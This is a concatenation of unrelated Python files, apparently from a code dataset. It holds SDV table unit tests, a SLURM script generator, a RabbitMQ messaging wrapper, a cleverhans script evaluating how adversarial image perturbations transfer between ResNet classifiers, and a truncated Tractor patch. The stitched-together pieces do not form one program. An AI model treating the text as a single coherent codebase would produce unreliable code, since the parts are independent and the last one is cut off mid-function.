@patch('sdv.metadata.table.rdt.transformers.NumericalTransformer',
spec_set=NumericalTransformer)
def test___init__(self, transformer_mock):
"""Test that ``__init__`` method passes parameters.
The ``__init__`` method should pass the custom parameters
to the ``NumericalTransformer``.
Input:
- rounding set to an int
- max_value set to an int
- min_value set to an int
Side Effects:
- ``NumericalTransformer`` should receive the correct parameters
"""
# Run
Table(rounding=-1, max_value=100, min_value=-50)
# Asserts
assert len(transformer_mock.mock_calls) == 2
transformer_mock.assert_any_call(
dtype=int, rounding=-1, max_value=100, min_value=-50)
transformer_mock.assert_any_call(
dtype=float, rounding=-1, max_value=100, min_value=-50)
@patch.object(Table, '_prepare_constraints')
def test___init__calls_prepare_constraints(self, _prepare_constraints_mock):
"""Test that ``__init__`` method calls ``_prepare_constraints"""
# Run
Table(constraints=[])
# Assert
_prepare_constraints_mock.called_once_with([])
def test__make_ids(self):
"""Test whether regex is correctly generating expressions."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
keys = Table._make_ids(metadata, 3)
assert (keys == pd.Series(['a', 'b', 'c'])).all()
def test__make_ids_fail(self):
"""Test if regex fails with more requested ids than available unique values."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
with pytest.raises(ValueError):
Table._make_ids(metadata, 20)
def test__make_ids_unique_field_not_unique(self):
"""Test that id column is replaced with all unique values if not already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test__make_ids_unique_field_already_unique(self):
"""Test that id column is kept if already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [9, 1, 8, 2, 3, 7, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].equals(data['item 0'])
def test__make_ids_unique_field_index_out_of_order(self):
"""Test that updated id column is unique even if index is out of order."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
}, index=[0, 1, 1, 2, 3, 5, 5, 6])
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test_transform_calls__transform_constraints(self):
"""Test that the `transform` method calls `_transform_constraints` with right parameters
The ``transform`` method is expected to call the ``_transform_constraints`` method
with the data and correct value for ``on_missing_column``.
Input:
- Table data
Side Effects:
- Calls _transform_constraints
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
dtypes = {'item 0': 'int', 'item 1': 'bool'}
table_mock = Mock()
table_mock.get_dtypes.return_value = dtypes
table_mock._transform_constraints.return_value = data
table_mock._anonymize.return_value = data
table_mock._hyper_transformer.transform.return_value = data
# Run
Table.transform(table_mock, data, 'error')
# Assert
expected_data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
mock_calls = table_mock._transform_constraints.mock_calls
args = mock_calls[0][1]
assert len(mock_calls) == 1
assert args[0].equals(expected_data)
assert args[1] == 'error'
def test__transform_constraints(self):
"""Test that method correctly transforms data based on constraints
The ``_transform_constraints`` method is expected to loop through constraints
and call each constraint's ``transform`` method on the data.
Input:
- Table data
Output:
- Transformed data
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
transformed_data = pd.DataFrame({
'item 0': [0, 0.5, 1],
'item 1': [6, 8, 10]
}, index=[0, 1, 2])
first_constraint_mock = Mock()
second_constraint_mock = Mock()
first_constraint_mock.transform.return_value = transformed_data
second_constraint_mock.return_value = transformed_data
table_mock = Mock()
table_mock._constraints = [first_constraint_mock, second_constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data)
# Assert
assert result.equals(transformed_data)
first_constraint_mock.transform.assert_called_once_with(data)
second_constraint_mock.transform.assert_called_once_with(transformed_data)
def test__transform_constraints_raises_error(self):
"""Test that method raises error when specified.
The ``_transform_constraints`` method is expected to raise ``MissingConstraintColumnError``
if the constraint transform raises one and ``on_missing_column`` is set to error.
Input:
- Table data
Side Effects:
- MissingConstraintColumnError
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run/Assert
with pytest.raises(MissingConstraintColumnError):
Table._transform_constraints(table_mock, data, 'error')
def test__transform_constraints_drops_columns(self):
"""Test that method drops columns when specified.
The ``_transform_constraints`` method is expected to drop columns associated with
a constraint its transform raises a MissingConstraintColumnError and ``on_missing_column``
is set to drop.
Input:
- Table data
Output:
- Table with dropped columns
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
constraint_mock.constraint_columns = ['item 0']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data, 'drop')
# Assert
expected_result = pd.DataFrame({
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
assert result.equals(expected_result)
def test__validate_data_on_constraints(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns True when the constraint columns are in the given data,
and the constraint.is_valid method returns True.
Input:
- Table data
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, True, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
def test__validate_data_on_constraints_invalid_input(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns False when the constraint columns are in the given data,
and the constraint.is_valid method returns False for any row.
Input:
- Table data contains an invalid row
Output:
- None
Side Effects:
- A ConstraintsNotMetError is thrown
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.is_valid.return_value = pd.Series([True, False, True])
constraint_mock.constraint_columns = ['a', 'b']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run and assert
with pytest.raises(ConstraintsNotMetError):
Table._validate_data_on_constraints(table_mock, data)
def test__validate_data_on_constraints_missing_cols(self):
"""Test the ``Table._validate_data_on_constraints`` method.
Expect that the method returns True when the constraint columns are not
in the given data.
Input:
- Table data that is missing a constraint column
Output:
- None
Side Effects:
- No error
"""
# Setup
data = pd.DataFrame({
'a': [0, 1, 2],
'b': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.constraint_columns = ['a', 'b', 'c']
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run
result = Table._validate_data_on_constraints(table_mock, data)
# Assert
assert result is None
def test_from_dict_min_max(self):
"""Test the ``Table.from_dict`` method.
Expect that when min_value and max_value are not provided,
they are set to 'auto'.
Input:
- A dictionary representing a table's metadata
Output:
- A Table object
"""
# Setup
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
# Run
metadata = Table.from_dict(metadata_dict)
# Assert
assert metadata._transformer_templates['integer'].max_value == 'auto'
assert metadata._transformer_templates['integer'].min_value == 'auto'
assert metadata._transformer_templates['integer'].rounding == 'auto'
assert metadata._transformer_templates['float'].max_value == 'auto'
assert metadata._transformer_templates['float'].min_value == 'auto'
assert metadata._transformer_templates['float'].rounding == 'auto'
| StarcoderdataPython |
1674834 | <reponame>leelabcnbc/tang_jcompneuro_revision
from sys import argv
from tang_jcompneuro.model_fitting import run_all_scripts, generate_all_scripts
from tang_jcompneuro.model_fitting_gabor import models_to_train
header = """
#!/usr/bin/env bash
#SBATCH --nodes=1
#SBATCH --cpus-per-task=2
#SBATCH --time=24:00:00
#SBATCH --mem=25G
#SBATCH --gres=gpu:1
#SBATCH --exclude=compute-1-11
# --exclude is to reserve that bad node
""".strip()
if __name__ == '__main__':
use_slurm = len(argv) == 1
print(models_to_train)
# input('haha')
script_dict = generate_all_scripts(header, 'gabor',models_to_train,
# ('multi,2,1',),
# override={
# # 'seed_list': [1],
# 'neural_dataset_to_process': ('MkE2_Shape',),
# 'subset_list': ('all',)
# },
)
run_all_scripts(script_dict, slurm=use_slurm)
| StarcoderdataPython |
3294705 | import sys,os,ssl
import pika,time
import logging
logger = logging.getLogger(__name__)
logging.getLogger('pika').setLevel(logging.WARNING)
#logging.getLogger('select_connection').setLevel(logging.DEBUG)
class MessageInterface:
def __init__(self,
username = '',
password = '',
host = '',
port = -1,
virtual_host = '/',
socket_timeout = 120,
exchange_name = '',
exchange_type = 'topic',
exchange_durable = True,
exchange_auto_delete = False,
ssl_cert = '',
ssl_key = '',
ssl_ca_certs = '',
queue_is_durable = True,
queue_is_exclusive = False,
queue_is_auto_delete = False,
):
self.username = username
self.password = password
self.host = host
self.port = port
self.virtual_host = virtual_host
self.socket_timeout = socket_timeout
self.exchange_name = exchange_name
self.exchange_type = exchange_type
self.exchange_durable = exchange_durable
self.exchange_auto_delete = exchange_auto_delete
self.queue_is_durable = queue_is_durable
self.queue_is_exclusive = queue_is_exclusive
self.queue_is_auto_delete = queue_is_auto_delete
self.ssl_cert = ssl_cert
self.ssl_key = ssl_key
self.ssl_ca_certs = ssl_ca_certs
self.credentials = None
self.parameters = None
self.connection = None
self.channel = None
def open_blocking_connection(self):
logger.debug("open blocking connection")
self.create_connection_parameters()
# open the connection and grab the channel
try:
self.connection = pika.BlockingConnection(self.parameters)
except:
logger.exception(' Exception received while trying to open blocking connection to message server')
raise
try:
self.channel = self.connection.channel()
except:
logger.exception(' Exception received while trying to open a channel to the message server')
raise
logger.debug("create exchange, name = " + self.exchange_name)
# make sure exchange exists (doesn't do anything if already created)
self.channel.exchange_declare(
exchange = self.exchange_name,
exchange_type = self.exchange_type,
durable = self.exchange_durable,
auto_delete = self.exchange_auto_delete,
)
def open_select_connection(self,
on_open_callback = None,
on_open_error_callback = None,
on_close_callback = None,
stop_ioloop_on_close = True,
):
logger.debug("create select connection")
self.create_connection_parameters()
# open the connection
if on_open_callback is not None:
try:
self.connection = pika.SelectConnection(self.parameters,
on_open_callback,
on_open_error_callback,
on_close_callback,
stop_ioloop_on_close,
)
except:
logger.error(' Exception received while trying to open select connection to message server: ' + str(sys.exc_info()))
raise
def create_connection_parameters(self):
logger.debug("create connection parameters, server = " + self.host + " port = " + str(self.port))
# need to set credentials to login to the message server
#self.credentials = pika.PlainCredentials(self.username,self.password)
self.credentials = pika.credentials.ExternalCredentials()
ssl_options_dict = {
"certfile": self.ssl_cert,
"keyfile": self.ssl_key,
"ca_certs": self.ssl_ca_certs,
"cert_reqs": ssl.CERT_REQUIRED,
}
#logger.debug(str(ssl_options_dict))
# setup our connection parameters
self.parameters = pika.ConnectionParameters(
host = self.host,
port = self.port,
virtual_host = self.virtual_host,
credentials = self.credentials,
socket_timeout = self.socket_timeout,
ssl = True,
ssl_options = ssl_options_dict,
)
def create_queue(self,name,routing_key):
# declare a random queue which this job will use to receive messages
# durable = survive reboots of the broker
# exclusive = only current connection can access this queue
# auto_delete = queue will be deleted after connection is closed
self.channel.queue_declare(
queue = str(name),
durable = self.queue_is_durable,
exclusive = self.queue_is_exclusive,
auto_delete = self.queue_is_auto_delete
)
# now bind this queue to the exchange, using a routing key
# any message submitted to the echange with the
# routing key will appear on this queue
self.channel.queue_bind(exchange=self.exchange_name,
queue=str(name),
routing_key=str(routing_key)
)
def close(self):
#self.channel.close()
#self.connection.close()
self.channel = None
self.connection = None
def send_msg(self,
message_body,
routing_key,
exchange_name = None,
message_headers = {},
priority = 0, # make message persistent
delivery_mode = 2, # default
):
try:
if exchange_name is None:
exchange_name = self.exchange_name
timestamp = time.time()
# create the message properties
properties = pika.BasicProperties(
delivery_mode = delivery_mode,
priority = priority,
timestamp = timestamp,
headers = message_headers,
)
logger.debug("sending message body:\n" + str(message_body))
logger.debug('sending message to exchange: ' + self.exchange_name)
logger.debug('sending message with routing key: ' + routing_key)
self.channel.basic_publish(
exchange = exchange_name,
routing_key = routing_key,
body = message_body,
properties = properties,
)
except Exception,e:
logger.exception('exception received while trying to send message')
raise Exception('exception received while trying to send message' + str(e))
def receive_msg(self,queue_name):
# retrieve one message
method, properties, body = self.channel.basic_get(queue=queue_name)
return method,properties,body
def purge_queue(self,queue_name):
self.channel.queue_purge(queue = queue_name)
| StarcoderdataPython |
1773242 | from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten, Lambda
from keras.optimizers import Adam, SGD
from keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau
from keras.callbacks import ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import mnist, cifar10, cifar100
import tensorflow as tf
import numpy as np
import os
from scipy.io import loadmat
import math
from utils.model import resnet_v1, resnet_v2
import cleverhans.attacks as attacks
from cleverhans.utils_tf import model_eval
from utils.keras_wraper_ensemble import KerasModelWrapper
from utils.utils_model_eval import model_eval_targetacc
FLAGS = tf.app.flags.FLAGS
#Common Flags for two models
tf.app.flags.DEFINE_integer('batch_size', 50, 'batch_size for attack')
tf.app.flags.DEFINE_string('optimizer', 'mom', '')
tf.app.flags.DEFINE_string('attack_method', 'FastGradientMethod', '')
tf.app.flags.DEFINE_integer('version', 2, '')
tf.app.flags.DEFINE_float('lr', 0.01, 'initial lr')
tf.app.flags.DEFINE_bool('target', True, 'is target attack or not')
tf.app.flags.DEFINE_integer('num_iter', 10, '')
tf.app.flags.DEFINE_string('dataset', 'cifar10', '')
tf.app.flags.DEFINE_bool('use_random', False, 'whether use random center or MMLDA center in the network')
tf.app.flags.DEFINE_bool('use_dense', True, 'whether use extra dense layer in the network')
tf.app.flags.DEFINE_bool('use_leaky', False, 'whether use leaky relu in the network')
tf.app.flags.DEFINE_integer('epoch', 180, 'the epoch of model to load')
tf.app.flags.DEFINE_bool('use_BN', True, 'whether use batch normalization in the network')
# SCE, MMC-10, MMC-100, AT-SCE, AT-MMC-10, AT-MMC-100
tf.app.flags.DEFINE_string('model_1', 'SCE', '')
tf.app.flags.DEFINE_string('model_2', 'MMC-10', '')
#Specific Flags for model 1
tf.app.flags.DEFINE_float('mean_var_1', 10, 'parameter in MMLDA')
tf.app.flags.DEFINE_string('attack_method_for_advtrain_1', 'FastGradientMethod', '')
tf.app.flags.DEFINE_bool('use_target_1', False, 'whether use target attack or untarget attack for adversarial training')
tf.app.flags.DEFINE_bool('use_ball_1', True, 'whether use ball loss or softmax')
tf.app.flags.DEFINE_bool('use_MMLDA_1', True, 'whether use MMLDA or softmax')
tf.app.flags.DEFINE_bool('use_advtrain_1', True, 'whether use advtraining or normal training')
tf.app.flags.DEFINE_float('adv_ratio_1', 1.0, 'the ratio of adversarial examples in each mini-batch')
tf.app.flags.DEFINE_bool('normalize_output_for_ball_1', True, 'whether apply softmax in the inference phase')
#Specific Flags for model 2
tf.app.flags.DEFINE_float('mean_var_2', 10, 'parameter in MMLDA')
tf.app.flags.DEFINE_string('attack_method_for_advtrain_2', 'FastGradientMethod', '')
tf.app.flags.DEFINE_bool('use_target_2', False, 'whether use target attack or untarget attack for adversarial training')
tf.app.flags.DEFINE_bool('use_ball_2', True, 'whether use ball loss or softmax')
tf.app.flags.DEFINE_bool('use_MMLDA_2', True, 'whether use MMLDA or softmax')
tf.app.flags.DEFINE_bool('use_advtrain_2', True, 'whether use advtraining or normal training')
tf.app.flags.DEFINE_float('adv_ratio_2', 1.0, 'the ratio of adversarial examples in each mini-batch')
tf.app.flags.DEFINE_bool('normalize_output_for_ball_2', True, 'whether apply softmax in the inference phase')
##### model 1 is the substitute model used to craft adversarial examples, model 2 is the original model used to classify these adversarial examples.
def return_paras(model_name):
if model_name == 'SCE':
return 0, None, False, False, False, False, 0.0, True
elif model_name == 'MMC-10':
return 10.0, None, False, True, True, False, 0.0, False
elif model_name == 'MMC-100':
return 100.0, None, False, True, True, False, 0.0, False
elif model_name == 'AT-SCE':
return 0, 'MadryEtAl', True, False, False, True, 1.0, True
elif model_name == 'AT-MMC-10':
return 10, 'MadryEtAl', True, True, True, True, 1.0, False
elif model_name == 'AT-MMC-100':
return 100, 'MadryEtAl', True, True, True, True, 1.0, False
else:
return None
FLAGS.mean_var_1, FLAGS.attack_method_for_advtrain_1, FLAGS.use_target_1, FLAGS.use_ball_1, \
FLAGS.use_MMLDA_1, FLAGS.use_advtrain_1, FLAGS.adv_ratio_1, FLAGS.normalize_output_for_ball_1 = return_paras(FLAGS.model_1)
FLAGS.mean_var_2, FLAGS.attack_method_for_advtrain_2, FLAGS.use_target_2, FLAGS.use_ball_2, \
FLAGS.use_MMLDA_2, FLAGS.use_advtrain_2, FLAGS.adv_ratio_2, FLAGS.normalize_output_for_ball_2 = return_paras(FLAGS.model_2)
# Load the dataset
if FLAGS.dataset=='mnist':
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = np.expand_dims(x_train, axis=3)
x_test = np.expand_dims(x_test, axis=3)
epochs = 50
num_class = 10
epochs_inter = [30,40]
x_place = tf.placeholder(tf.float32, shape=(None, 28, 28, 3))
elif FLAGS.dataset=='cifar10':
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
epochs = 200
num_class = 10
epochs_inter = [100,150]
x_place = tf.placeholder(tf.float32, shape=(None, 32, 32, 3))
elif FLAGS.dataset=='cifar100':
(x_train, y_train), (x_test, y_test) = cifar100.load_data()
epochs = 200
num_class = 100
epochs_inter = [100,150]
x_place = tf.placeholder(tf.float32, shape=(None, 32, 32, 3))
else:
print('Unknown dataset')
# These parameters are usually fixed
subtract_pixel_mean = True
version = FLAGS.version # Model version
n = 5 # n=5 for resnet-32 v1
# Computed depth from supplied model parameter n
if version == 1:
depth = n * 6 + 2
feature_dim = 64
elif version == 2:
depth = n * 9 + 2
feature_dim = 256
if FLAGS.use_BN==True:
BN_name = '_withBN'
print('Use BN in the model')
else:
BN_name = '_noBN'
print('Do not use BN in the model')
if FLAGS.use_random==True:
name_random = '_random'
else:
name_random = ''
if FLAGS.use_leaky==True:
name_leaky = '_withleaky'
else:
name_leaky = ''
if FLAGS.use_dense==True:
name_dense = ''
else:
name_dense = '_nodense'
#Load means in MMLDA
kernel_dict = loadmat('kernel_paras/meanvar1_featuredim'+str(feature_dim)+'_class'+str(num_class)+name_random+'.mat')
mean_logits = kernel_dict['mean_logits'] #num_class X num_dense
mean_logits_1 = FLAGS.mean_var_1 * tf.constant(mean_logits,dtype=tf.float32)
mean_logits_2 = FLAGS.mean_var_2 * tf.constant(mean_logits,dtype=tf.float32)
#MMLDA prediction function
def MMLDA_layer_1(x, means=mean_logits_1, num_class=num_class, use_ball=FLAGS.use_ball_1):
#x_shape = batch_size X num_dense
x_expand = tf.tile(tf.expand_dims(x,axis=1),[1,num_class,1]) #batch_size X num_class X num_dense
mean_expand = tf.expand_dims(means,axis=0) #1 X num_class X num_dense
logits = -tf.reduce_sum(tf.square(x_expand - mean_expand), axis=-1) #batch_size X num_class
if use_ball==True:
if FLAGS.normalize_output_for_ball_1==False:
return logits
else:
return tf.nn.softmax(logits, axis=-1)
else:
return tf.nn.softmax(logits, axis=-1)
def MMLDA_layer_2(x, means=mean_logits_2, num_class=num_class, use_ball=FLAGS.use_ball_2):
#x_shape = batch_size X num_dense
x_expand = tf.tile(tf.expand_dims(x,axis=1),[1,num_class,1]) #batch_size X num_class X num_dense
mean_expand = tf.expand_dims(means,axis=0) #1 X num_class X num_dense
logits = -tf.reduce_sum(tf.square(x_expand - mean_expand), axis=-1) #batch_size X num_class
if use_ball==True:
if FLAGS.normalize_output_for_ball_2==False:
return logits
else:
return tf.nn.softmax(logits, axis=-1)
else:
return tf.nn.softmax(logits, axis=-1)
# Load the data.
y_test_target = np.zeros_like(y_test)
for i in range(y_test.shape[0]):
l = np.random.randint(num_class)
while l == y_test[i][0]:
l = np.random.randint(num_class)
y_test_target[i][0] = l
print('Finish crafting y_test_target!!!!!!!!!!!')
# Input image dimensions.
input_shape = x_train.shape[1:]
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
clip_min = 0.0
clip_max = 1.0
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
clip_min -= x_train_mean
clip_max -= x_train_mean
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_class)
y_test = keras.utils.to_categorical(y_test, num_class)
y_test_target = keras.utils.to_categorical(y_test_target, num_class)
# Define input TF placeholder
y_place = tf.placeholder(tf.float32, shape=(None, num_class))
y_target = tf.placeholder(tf.float32, shape=(None, num_class))
sess = tf.Session()
keras.backend.set_session(sess)
model_input_1 = Input(shape=input_shape)
model_input_2 = Input(shape=input_shape)
#dim of logtis is batchsize x dim_means
if version == 2:
original_model_1,_,_,_,final_features_1 = resnet_v2(input=model_input_1, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
else:
original_model_1,_,_,_,final_features_1 = resnet_v1(input=model_input_1, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
if version == 2:
original_model_2,_,_,_,final_features_2 = resnet_v2(input=model_input_2, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
else:
original_model_2,_,_,_,final_features_2 = resnet_v1(input=model_input_2, depth=depth, num_classes=num_class, \
use_BN=FLAGS.use_BN, use_dense=FLAGS.use_dense, use_leaky=FLAGS.use_leaky)
##### Load model 1 #####
#Whether use target attack for adversarial training
if FLAGS.use_target_1==False:
is_target_1 = ''
else:
is_target_1 = 'target'
if FLAGS.use_advtrain_1==True:
dirr_1 = 'advtrained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_1 = '_'+is_target_1+FLAGS.attack_method_for_advtrain_1
adv_ratio_name_1 = '_advratio'+str(FLAGS.adv_ratio_1)
mean_var_1 = int(FLAGS.mean_var_1)
else:
dirr_1 = 'trained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_1 = ''
adv_ratio_name_1 = ''
mean_var_1 = FLAGS.mean_var_1
if FLAGS.use_MMLDA_1==True:
print('Using MMLDA for model 1, the substitute model')
new_layer_1 = Lambda(MMLDA_layer_1)
predictions_1 = new_layer_1(final_features_1)
model_1 = Model(input=model_input_1, output=predictions_1)
use_ball_1=''
if FLAGS.use_ball_1==False:
print('Using softmax function for model 1')
use_ball_1='_softmax'
filepath_dir_1 = dirr_1+'resnet32v'+str(version)+'_meanvar'+str(mean_var_1) \
+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size) \
+attack_method_for_advtrain_1+adv_ratio_name_1+BN_name+name_leaky+name_dense+name_random+use_ball_1+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
else:
print('Using softmax loss for model 1')
model_1 = original_model_1
filepath_dir_1 = dirr_1+'resnet32v'+str(version)+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size)+attack_method_for_advtrain_1+adv_ratio_name_1+BN_name+name_leaky+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
wrap_ensemble_1 = KerasModelWrapper(model_1, num_class=num_class)
model_1.load_weights(filepath_dir_1)
##### Load model 2 #####
#Whether use target attack for adversarial training
if FLAGS.use_target_2==False:
is_target_2 = ''
else:
is_target_2 = 'target'
if FLAGS.use_advtrain_2==True:
dirr_2 = 'advtrained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_2 = '_'+is_target_2+FLAGS.attack_method_for_advtrain_2
adv_ratio_name_2 = '_advratio'+str(FLAGS.adv_ratio_2)
mean_var_2 = int(FLAGS.mean_var_2)
else:
dirr_2 = 'trained_models/'+FLAGS.dataset+'/'
attack_method_for_advtrain_2 = ''
adv_ratio_name_2 = ''
mean_var_2 = FLAGS.mean_var_2
if FLAGS.use_MMLDA_2==True:
print('Using MMLDA for model 2, the original model')
new_layer_2 = Lambda(MMLDA_layer_2)
predictions_2 = new_layer_2(final_features_2)
model_2 = Model(input=model_input_2, output=predictions_2)
use_ball_2=''
if FLAGS.use_ball_2==False:
print('Using softmax function for model 2')
use_ball_2='_softmax'
filepath_dir_2 = dirr_2+'resnet32v'+str(version)+'_meanvar'+str(mean_var_2) \
+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size) \
+attack_method_for_advtrain_2+adv_ratio_name_2+BN_name+name_leaky+name_dense+name_random+use_ball_2+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
else:
print('Using softmax loss for model 2')
model_2 = original_model_2
filepath_dir_2 = dirr_2+'resnet32v'+str(version)+'_'+FLAGS.optimizer \
+'_lr'+str(FLAGS.lr) \
+'_batchsize'+str(FLAGS.batch_size)+attack_method_for_advtrain_2+adv_ratio_name_2+BN_name+name_leaky+'/' \
+'model.'+str(FLAGS.epoch).zfill(3)+'.h5'
wrap_ensemble_2 = KerasModelWrapper(model_2, num_class=num_class)
model_2.load_weights(filepath_dir_2)
# Initialize the attack method
if FLAGS.attack_method == 'MadryEtAl':
att = attacks.MadryEtAl(wrap_ensemble_1)
elif FLAGS.attack_method == 'FastGradientMethod':
att = attacks.FastGradientMethod(wrap_ensemble_1)
elif FLAGS.attack_method == 'MomentumIterativeMethod':
att = attacks.MomentumIterativeMethod(wrap_ensemble_1)
elif FLAGS.attack_method == 'BasicIterativeMethod':
att = attacks.BasicIterativeMethod(wrap_ensemble_1)
# Consider the attack to be constant
eval_par = {'batch_size': FLAGS.batch_size}
for eps in range(2):
eps_ = (eps+1) * 8
print('eps is %d'%eps_)
eps_ = eps_ / 256.0
if FLAGS.target==False:
y_target = None
if FLAGS.attack_method == 'FastGradientMethod':
att_params = {'eps': eps_,
'clip_min': clip_min,
'clip_max': clip_max,
'y_target': y_target}
else:
att_params = {'eps': eps_,
#'eps_iter': eps_*1.0/FLAGS.num_iter,
#'eps_iter': 3.*eps_/FLAGS.num_iter,
'eps_iter': 2. / 256.,
'clip_min': clip_min,
'clip_max': clip_max,
'nb_iter': FLAGS.num_iter,
'y_target': y_target}
adv_x = tf.stop_gradient(att.generate(x_place, **att_params))
preds = model_2(adv_x)
if FLAGS.target==False:
acc = model_eval(sess, x_place, y_place, preds, x_test, y_test, args=eval_par)
print('adv_acc of model 1 transfer to model 2 is: %.3f' %acc)
else:
acc = model_eval_targetacc(sess, x_place, y_place, y_target, preds, x_test, y_test, y_test_target, args=eval_par)
print('adv_acc_target of model 1 transfer to model 2 is: %.3f' %acc)
| StarcoderdataPython |
1651722 | # ######################################################################################################################
# Copyright 2020 TRIXTER GmbH #
# #
# Redistribution and use in source and binary forms, with or without modification, are permitted provided #
# that the following conditions are met: #
# #
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the #
# following disclaimer in the documentation and/or other materials provided with the distribution. #
# #
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, #
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS #
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF #
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY #
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# ######################################################################################################################
from tractor.api.author.base import *
class Command(KeyValueElement):
"""Command Patch"""
def __init__(self, local=False, **kw):
if local:
